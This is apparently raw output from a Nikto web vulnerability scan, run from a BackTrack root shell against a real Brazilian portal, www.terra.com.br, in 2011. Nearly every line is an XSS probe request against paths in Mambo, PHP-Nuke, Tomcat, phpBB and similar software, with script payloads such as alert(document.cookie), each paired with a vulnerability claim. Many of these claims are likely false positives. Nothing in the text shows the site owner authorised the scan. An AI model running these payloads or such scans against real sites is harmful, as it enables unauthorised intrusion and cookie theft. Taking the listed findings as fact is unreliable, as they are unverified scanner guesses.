root@bt:~# nikto -h www.terra.com.br
- Nikto v2.03/2.04
--------------------------------------------------------------------------
+ No web server found on 200.154.56.80:Host: 200.154.56.80 (www.terra.com.br) Status: Up
--------------------------------------------------------------------------
+ Target IP: 200.154.56.80
+ Target Hostname: www.terra.com.br
+ Target Port: 80
+ Start Time: 2011-08-30 11:18:11
--------------------------------------------------------------------------
+ Server: No banner retrieved
- Root page / redirects to: /portal/
- /robots.txt - contains 10 'disallow' entries which should be manually viewed. (GET)
+ OSVDB-0: GET /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php?option=search&searchword=<script>alert(document.cookie);</script> : Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php?dir=<script>alert('Vulnerable')</script> : Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-0: GET /https-admserv/bin/index?/<script>alert(document.cookie)</script> : Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.
+ OSVDB-0: GET /clusterframe.jsp?cluster=<script>alert(document.cookie)</script> : Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.
+ OSVDB-0: GET /upload.php?type=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4619: GET /soinfo.php?\"><script>alert('Vulnerable')</script> : The PHP script soinfo.php is vulnerable to Cross Site Scripting Set expose_php = Off in php.ini.
+ OSVDB-0: GET /666%0a%0a<script>alert('Vulnerable');</script>666.jsp : Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script> : NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script> : The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script> : IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-17665: GET /SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to Cross Site Scripting
+ OSVDB-17666: GET /_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to Cross Site Scripting
+ OSVDB-0: GET /nosuchurl/><script>alert('Vulnerable')</script> : JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
+ OSVDB-0: GET /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgi/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.aspx : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.asp : Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ OSVDB-0: GET /catinfo?<u><b>TESTING : The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /user.php?op=userinfo&uname=<script>alert('hi');</script> : The PhpNuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> : MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script> : SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ OSVDB-0: GET /submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview : This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P : CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: POST /servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: POST /servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/ContentServer?pagename=<script>alert('Vulnerable')</script> : Open Market Inc.ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search/index.cfm?<script>alert(\"Vulnerable\")</script> : Search agent allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search.php?zoom_query=<script>alert(\"hello\")</script> : Wrensoft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /search.php?searchfor=\"><script>alert('Vulnerable');</script> : Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search.asp?term=<%00script>alert('Vulnerable')</script> : ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /samples/search.dll?query=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X] : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</script> : PHP Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-32774: GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-32774: GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-0: GET /phpimageview.php?pic=javascript:alert('Vulnerable') : PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script> : phpBB is vulnerable to Cross Site Scripting (XSS), upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script> : phpBB is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script> : Vignette server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to the latest version.
+ OSVDB-0: GET /node/view/666\"><script>alert(document.domain)</script> : Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /netutils/whodata.stm?sitename=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /nav/cList.php?root=</script><script>alert('Vulnerable')/<script> : RaQ3 server script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= : myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent : myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /myhome.php?action=messages&box=<script>alert('Vulnerable')</script> : OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script> : Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> : The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2 : The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script> : Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> : This install of PHPNuke's modules.php is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0 : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> : The DMOZGateway (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> : Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script> : This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /megabook/admin.cgi?login=<script>alert('Vulnerable')</script> : Megabook guestbook is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mailman/listinfo/<script>alert('Vulnerable')</script> : Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script> : IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.
+ OSVDB-0: GET /launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /launch.asp?NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /isapi/testisa.dll?check1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script> : Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php?action=storenew&username=<script>alert('Vulnerable')</script> : SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ OSVDB-0: GET /index.php/\"><script><script>alert(document.cookie)</script>< : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> : myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> : myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /gallery/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script> : YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /error/500error.jsp?et=1<script>alert('Vulnerable')</script>; : Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /download.php?sortby=&dcategory=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview : This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script> : RSA ClearTrust allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 : DCP-Portal v5.3.1 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bb000001.pl<script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
